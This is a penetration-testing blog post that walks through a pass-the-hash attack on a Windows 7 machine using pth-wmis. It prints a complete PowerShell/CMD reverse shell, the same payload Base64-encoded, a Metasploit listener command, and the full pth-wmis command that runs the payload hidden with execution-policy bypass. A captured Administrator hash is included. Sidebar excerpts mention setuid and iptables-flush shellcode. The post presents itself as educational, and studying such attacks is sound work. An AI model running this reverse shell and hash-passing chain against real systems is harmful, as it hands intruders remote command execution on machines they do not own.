Skip to main content

pth-wmis and Combined PowerShell and CMD Reverse Shell


Useful Background:

http://passing-the-hash.blogspot.ca/2013/04/missing-pth-tools-writeup-wmic-wmis-curl.html
http://passing-the-hash.blogspot.ca/2013/07/WMIS-PowerSploit-Shells.html

Resource:

Combined PowerShell and CMD Reverse Shell

Purpose:

Test the use of the "Combined PowerShell and CMD Reverse Shell" together with the Pass-The-Hash version of wmis (pth-wmis).

Disclaimer:

These scripts are provided for educational purposes only and for use by Ethical Hackers. Use only on systems for which you have acquired all the legally required contracts and permissions for use. It is your responsibility to determine whether you are legally permitted to use these scripts in your country and for your purposes. No warrantee or guarantees are provided.


Attacking Box:

32bit Offsec VM - Kali

Target Box:

Windows 7 Professional Service Pack 1

We Have A Hash

From another compromised box on the same network we have captured the local Administrator's hash:

Administrator:500:NO PASSWORD*********************:DC4BD458EDB0D834A5775F69453F2216:::

Rather than spend excessive time cracking it we are going to use a Pass-The-Hash attack.

Replace the NO PASSWORD**... text with a blank LM Hash:
aad3b435b51404eeaad3b435b51404ee:DC4BD458EDB0D834A5775F69453F2216

Grab The PowerShell Component:

The first thing that we need to do is to grab the PowerShell component from the "Combined PowerShell and CMD Reverse Shell"
$ps=$false;$hostip=(gci -path env:HOSTIP).value;$port=(gci -path env:EXP1).value;$client = New-Object System.Net.Sockets.TCPClient($hostip,$port);$stream = $client.GetStream();[byte[]]$bytes = 0..50000|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$cmd=(get-childitem Env:ComSpec).value;$inArray=$data.split();$item=$inArray[0];if(($item -eq '$ps') -and ($ps -eq $false)){$ps=$true}if($item -like '?:'){$item='d:'}$myArray=@('cd','exit','d:','pwd','ls','ps','rm','cp','mv','cat');$do=$false;foreach ($i in $myArray){if($item -eq $i){$do=$true}}if($do -or $ps){$sendback=( iex $data 2>&1 |Out-String)}else{$data2='/c '+$data;$sendback = ( &$cmd $data2 2>&1 | Out-String)};if($ps){$prompt='PS ' + (pwd).Path}else{$prompt=(pwd).Path}$sendback2 = $data + $sendback + $prompt + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Base64 Encode It: 

The PowerShell not only needs to be Base64 encoded but it also needs to be Unicode encoded first. Personally I like to put what I need encoded into a command.txt file and then use PowerShell to encode it:

$fileName = "command.txt"
$fileContent = get-content $fileName
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($fileContent)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText | set-content ($fileName + ".b64")
The result is in a file called command.txt.b64.
Result:
JABwAHMAPQAkAGYAYQBsAHMAZQA7ACQAaABvAHMAdABpAHAAPQAoAGcAYwBpACAALQBwAGEAdABoACAAZQBuAHYAOgBIAE8AUwBUAEkAUAApAC4AdgBhAGwAdQBlADsAJABwAG8AcgB0AD0AKABnAGMAaQAgAC0AcABhAHQAaAAgAGUAbgB2ADoARQBYAFAAMQApAC4AdgBhAGwAdQBlADsAJABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACQAaABvAHMAdABpAHAALAAkAHAAbwByAHQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA1ADAAMAAwADAAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAYwBtAGQAPQAoAGcAZQB0AC0AYwBoAGkAbABkAGkAdABlAG0AIABFAG4AdgA6AEMAbwBtAFMAcABlAGMAKQAuAHYAYQBsAHUAZQA7ACQAaQBuAEEAcgByAGEAeQA9ACQAZABhAHQAYQAuAHMAcABsAGkAdAAoACkAOwAkAGkAdABlAG0APQAkAGkAbgBBAHIAcgBhAHkAWwAwAF0AOwBpAGYAKAAoACQAaQB0AGUAbQAgAC0AZQBxACAAJwAkAHAAcwAnACkAIAAtAGEAbgBkACAAKAAkAHAAcwAgAC0AZQBxACAAJABmAGEAbABzAGUAKQApAHsAJABwAHMAPQAkAHQAcgB1AGUAfQBpAGYAKAAkAGkAdABlAG0AIAAtAGwAaQBrAGUAIAAnAD8AOgAnACkAewAkAGkAdABlAG0APQAnAGQAOgAnAH0AJABtAHkAQQByAHIAYQB5AD0AQAAoACcAYwBkACcALAAnAGUAeABpAHQAJwAsACcAZAA6ACcALAAnAHAAdwBkACcALAAnAGwAcwAnACwAJwBwAHMAJwAsACcAcgBtACcALAAnAGMAcAAnACwAJwBtAHYAJwAsACcAYwBhAHQAJwApADsAJABkAG8APQAkAGYAYQBsAHMAZQA7AGYAbwByAGUAYQBjAGgAIAAoACQAaQAgAGkAbgAgACQAbQB5AEEAcgByAGEAeQApAHsAaQBmACgAJABpAHQAZQBtACAALQBlAHEAIAAkAGkAKQB7ACQAZABvAD0AJAB0AHIAdQBlAH0AfQBpAGYAKAAkAGQAbwAgAC0AbwByACAAJABwAHMAKQB7ACQAcwBlAG4AZABiAGEAYwBrAD0AKAAgAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwATwB1AHQALQBTAHQAcgBpAG4AZwApAH0AZQBsAHMAZQB7ACQAZABhAHQAYQAyAD0AJwAvAGMAIAAnACsAJABkAGEAdABhADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKAAgACYAJABjAG0AZAAgACQAZABhAHQAYQAyACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACkAfQA7AGkAZgAoACQAcABzACkAewAkAHAAcgBvAG0AcAB0AD0AJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAfQBlAGwAcwBlAHsAJABwAHIAbwBtAHAAdAA9ACgAcAB3AGQAKQAuAFAAYQB0AGgAfQAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAZABhAHQAYQAgACsAIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAkAHAAcgBvAG0AcAB0ACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA

 Set Up A Listener:

export HOSTIP=10.0.0.22;
export EXP1=5379;
msfconsole -q -x "setg LHOST $HOSTIP;use exploit/multi/handler;set ExitOnSession false;set PAYLOAD windows/x64/shell_reverse_tcp;set EXITFUNC thread;set LPORT $EXP1;exploit -j;";

Run pth-wmis: 

pth-wmis -U "demo/administrator"%"aad3b435b51404eeaad3b435b51404ee:DC4BD458EDB0D834A5775F69453F2216" //10.0.0.20 'cmd.exe /c "set HOSTIP=10.0.0.22 && set EXP1=5379 && powershell -NoP -nol -NonI -W Hidden -Exec Bypass -enc JABwAHMAPQAkAGYAYQBsAHMAZQA7ACQAaABvAHMAdABpAHAAPQAoAGcAYwBpACAALQBwAGEAdABoACAAZQBuAHYAOgBIAE8AUwBUAEkAUAApAC4AdgBhAGwAdQBlADsAJABwAG8AcgB0AD0AKABnAGMAaQAgAC0AcABhAHQAaAAgAGUAbgB2ADoARQBYAFAAMQApAC4AdgBhAGwAdQBlADsAJABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACQAaABvAHMAdABpAHAALAAkAHAAbwByAHQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA1ADAAMAAwADAAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAYwBtAGQAPQAoAGcAZQB0AC0AYwBoAGkAbABkAGkAdABlAG0AIABFAG4AdgA6AEMAbwBtAFMAcABlAGMAKQAuAHYAYQBsAHUAZQA7ACQAaQBuAEEAcgByAGEAeQA9ACQAZABhAHQAYQAuAHMAcABsAGkAdAAoACkAOwAkAGkAdABlAG0APQAkAGkAbgBBAHIAcgBhAHkAWwAwAF0AOwBpAGYAKAAoACQAaQB0AGUAbQAgAC0AZQBxACAAJwAkAHAAcwAnACkAIAAtAGEAbgBkACAAKAAkAHAAcwAgAC0AZQBxACAAJABmAGEAbABzAGUAKQApAHsAJABwAHMAPQAkAHQAcgB1AGUAfQBpAGYAKAAkAGkAdABlAG0AIAAtAGwAaQBrAGUAIAAnAD8AOgAnACkAewAkAGkAdABlAG0APQAnAGQAOgAnAH0AJABtAHkAQQByAHIAYQB5AD0AQAAoACcAYwBkACcALAAnAGUAeABpAHQAJwAsACcAZAA6ACcALAAnAHAAdwBkACcALAAnAGwAcwAnACwAJwBwAHMAJwAsACcAcgBtACcALAAnAGMAcAAnACwAJwBtAHYAJwAsACcAYwBhAHQAJwApADsAJABkAG8APQAkAGYAYQBsAHMAZQA7AGYAbwByAGUAYQBjAGgAIAAoACQAaQAgAGkAbgAgACQAbQB5AEEAcgByAGEAeQApAHsAaQBmACgAJABpAHQAZQBtACAALQBlAHEAIAAkAGkAKQB7ACQAZABvAD0AJAB0AHIAdQBlAH0AfQBpAGYAKAAkAGQAbwAgAC0AbwByACAAJABwAHMAKQB7ACQAcwBlAG4AZABiAGEAYwBrAD0AKAAgAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwATwB1AHQALQBTAHQAcgBpAG4AZwApAH0AZQBsAHMAZQB7ACQAZABhAHQAYQAyAD0AJwAvAGMAIAAnACsAJABkAGEAdABhADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKAAgACYAJABjAG0AZAAgACQAZABhAHQAYQAyACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACkAfQA7AGkAZgAoACQAcABzACkAewAkAHAAcgBvAG0AcAB0AD0AJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAfQBlAGwAcwBlAHsAJABwAHIAbwBtAHAAdAA9ACgAcAB3AGQAKQAuAFAAYQB0AGgAfQAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAZABhAHQAYQAgACsAIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAkAHAAcgBvAG0AcAB0ACAAKwAgACcAPgAgACcAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"'

Catch A Shell:



Comments

Post a Comment

Popular posts from this blog

PolySetuidExecve1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-77.php My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolySetuidExecve1434.nasm Published : https://www.exploit-db.com/exploits/41498/ Original Shellcode bytes = 49 My version: Number of bytes = 31 Number of nulls = 0 PolySetuidExecve1434.nasm Intro This shellcode when executed will first setuid(0) and then execute /bin/sh and provide you with a shell. The purpose of calling setuid(0) is, suppose that you have managed to inject this shellcode into an executable that is Set-UID root. I...
Post a Comment
Read more

PolyFlushIPTables1434

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification." http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/ Student ID: SLAE64-1434 Target Operating System : 64 bit Linux (x86_64 GNU/Linux) This blog post is part of Assignment 6: http://a41l4.blogspot.ca/2017/03/assignment-6.html The Original Version: http://shell-storm.org/shellcode/files/shellcode-683.php Original size: 50 bytes (don't believe what he says :) My Version: GitHub Link : https://github.com/rtaylor777/nasm/blob/master/PolyFlushIPTables1434.nasm Published : https://www.exploit-db.com/exploits/41503/ My version: Number of bytes = 47 Number of nulls = 0 PolyFlushIPTables1434.nasm  Intro This shellcode basically just executes /sbin/iptables -F without any other parameters. man iptables "-F, --flush [chain]               Flush ...
Post a Comment
Read more

Smbexec Install for Kali 2016.2

This is my how-to current as of August 31, 2017 . Context Kali Linux 2016.2 after: apt-get update apt-get upgrade apt-get dist-upgrade apt auto-remove restart Reason Training, see: https://www.cybrary.it/course/advanced-penetration-testing/ Video: https://www.cybrary.it/video/post-exploitation-part-4/ Downloads cd /opt git clone https://github.com/pentestgeek/smbexec.git git clone https://github.com/libyal/libesedb.git git clone https://github.com/csababarta/ntdsxtract /opt/NTDSXtract wget https://raw.githubusercontent.com/infoassure/dumpntds/master/dshashes.py -O /opt/NTDSXtract/dshashes.py Install Required Tools/Libraries apt-get install automake autoconf autopoint gcc-mingw-w64-x86-64 libtool pkg-config passing-the-hash ruby-nokogiri ruby-libxml libxml2-dev libxslt1-dev Build libesbdb cd /opt/libesedb/ ./synclibs.sh ./autogen.sh ./configure make Install Bundler gem install bundler   Install Smbexec First edit the file /opt/smbexec/smbe...
Post a Comment
Read more